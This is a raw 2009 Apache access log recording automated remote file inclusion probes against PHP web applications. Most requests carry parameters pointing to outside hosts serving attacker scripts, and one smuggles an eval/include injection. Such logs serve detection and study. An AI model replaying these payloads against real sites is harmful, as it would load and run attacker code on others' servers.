85.18.117.101 - - [26/May/2009:02:17:37 -0500] "GET /logs/access_log.1241654400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:02:17:37 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:02:17:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:21:38 -0500] "GET ///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:21:39 -0500] "GET /logs///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:21:40 -0500] "GET /logs/access_log.1237680000///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:22:02 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:22:02 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:22:02 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:22:02 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:22:11 -0500] "GET /logs///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:22:11 -0500] "GET ///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:22:11 -0500] "GET /logs/access_log.1237680000///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
38.99.44.102 - - [26/May/2009:02:22:20 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.106.142 - - [26/May/2009:02:25:18 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.185.228.6 - - [26/May/2009:02:26:18 -0500] "GET /logs/install/index.php?lng=../../include/main.inc&G_PATH=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
89.185.228.6 - - [26/May/2009:02:26:18 -0500] "GET /logs/access_log.1238112000/install/index.php?lng=../../include/main.inc&G_PATH=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.185.228.6 - - [26/May/2009:02:26:18 -0500] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:02:26:41 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:02:26:41 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:02:26:42 -0500] "GET /logs/access_log.1239408000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:02:26:42 -0500] "GET /logs/access_log.1242086400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:26:55 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:26:55 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:26:55 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
66.249.68.115 - - [26/May/2009:02:28:25 -0500] "GET /chain_clasp_04.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
217.73.161.62 - - [26/May/2009:02:28:53 -0500] "GET /logs///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:28:54 -0500] "GET ///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:02:28:54 -0500] "GET /logs/access_log.1237680000///skin/zero_vote/ask_password.php?dir=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:02:29:13 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:02:29:30 -0500] "GET /logs/access_log.1240704000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:02:29:46 -0500] "GET /logs/access_log.1242000000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:02:31:44 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:02:31:44 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:02:31:44 -0500] "GET //config/dbutil.bck.php?confdir=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:02:31:59 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:02:32:30 -0500] "GET /logs/access_log.1241740800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:32:58 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:32:58 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:33:00 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:33:03 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:33:06 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.109.102.96 - - [26/May/2009:02:33:06 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.233.22.209 - - [26/May/2009:02:33:12 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.233.22.209 - - [26/May/2009:02:33:13 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
210.116.102.163 - - [26/May/2009:02:33:13 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
210.116.102.163 - - [26/May/2009:02:33:14 -0500] "GET //skin/zero_vote/error.php?dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
85.18.117.101 - - [26/May/2009:02:34:13 -0500] "GET /logs/access_log.1241740800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:02:39:50 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:02:39:50 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:02:39:50 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:02:39:50 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.106.140 - - [26/May/2009:02:40:18 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.10.143 - - [26/May/2009:02:41:06 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:02:41:06 -0500] "GET //admin/include/lib.module.php?mod_root=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:02:41:06 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.84.147.205 - - [26/May/2009:02:43:16 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.84.147.205 - - [26/May/2009:02:43:16 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:02:45:08 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:02:45:08 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:02:45:08 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:02:45:08 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:46:48 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:46:48 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:46:48 -0500] "GET /logs/access_log.1242086400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:46:59 -0500] "GET /logs/access_log.1242000000/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:53:54 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:53:54 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:53:57 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:02:54:00 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:02:58:41 -0500] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:02:58:41 -0500] "GET ///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:02:58:41 -0500] "GET /logs/access_log.1232409600///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:02:58:41 -0500] "GET /logs/access_log.1230508800///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:59:39 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:59:39 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:59:39 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:02:59:47 -0500] "GET /logs/access_log.1240272000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:03:16 -0500] "GET ///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:03:16 -0500] "GET /logs/access_log.1232409600///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:03:16 -0500] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:03:16 -0500] "GET /logs/access_log.1230508800///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.249.68.115 - - [26/May/2009:03:04:04 -0500] "GET /bench001.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
61.250.85.200 - - [26/May/2009:03:04:42 -0500] "GET ///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:04:42 -0500] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:04:42 -0500] "GET /logs/access_log.1232409600///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:03:04:42 -0500] "GET /logs/access_log.1230508800///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
91.206.183.148 - - [26/May/2009:03:09:58 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.823"
91.206.183.148 - - [26/May/2009:03:09:58 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.823"
91.184.51.108 - - [26/May/2009:03:11:50 -0500] "GET /logs//guestbook1//admin.php?include_path=http://aaaaaaaa2.altervista.org/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
91.184.51.108 - - [26/May/2009:03:11:51 -0500] "GET //guestbook1//admin.php?include_path=http://aaaaaaaa2.altervista.org/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
85.214.83.196 - - [26/May/2009:03:14:34 -0500] "GET /logs//phplive/setup/header.php?css_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:03:14:34 -0500] "GET //phplive/setup/header.php?css_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:03:14:34 -0500] "GET /logs/access_log.1236643200//phplive/setup/header.php?css_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
91.206.183.148 - - [26/May/2009:03:14:37 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.823"
91.206.183.148 - - [26/May/2009:03:14:38 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.823"
85.214.83.196 - - [26/May/2009:03:15:38 -0500] "GET /logs/access_log.1230508800//phplive/setup/header.php?css_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:03:15:44 -0500] "GET /logs/access_log.1236470400//phplive/setup/header.php?css_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:03:16:16 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.240.12.4 - - [26/May/2009:03:16:16 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://10kresidual.com/redhawkarms//includes/id2x.txt??%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.150.52.114 - - [26/May/2009:03:16:30 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.150.52.114 - - [26/May/2009:03:16:30 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.150.52.114 - - [26/May/2009:03:16:30 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.150.52.114 - - [26/May/2009:03:16:30 -0500] "GET /logs/access_log.1240790400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:03:19:35 -0500] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:03:19:35 -0500] "GET /logs/access_log.1232409600///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:03:19:35 -0500] "GET ///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:03:19:35 -0500] "GET /logs/access_log.1230508800///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.167.232.42 - - [26/May/2009:03:20:19 -0500] "GET //?path%5Bdocroot%5D=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.167.232.42 - - [26/May/2009:03:20:19 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.167.232.42 - - [26/May/2009:03:20:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
72.167.232.42 - - [26/May/2009:03:20:27 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.231.138.99 - - [26/May/2009:03:21:07 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aaaaaaaa2.altervista.org/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
83.231.138.99 - - [26/May/2009:03:21:08 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aaaaaaaa2.altervista.org/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
213.198.53.173 - - [26/May/2009:03:23:14 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.198.53.173 - - [26/May/2009:03:23:14 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.198.53.173 - - [26/May/2009:03:23:14 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.198.53.173 - - [26/May/2009:03:23:15 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:03:24:25 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:03:24:25 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:03:24:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
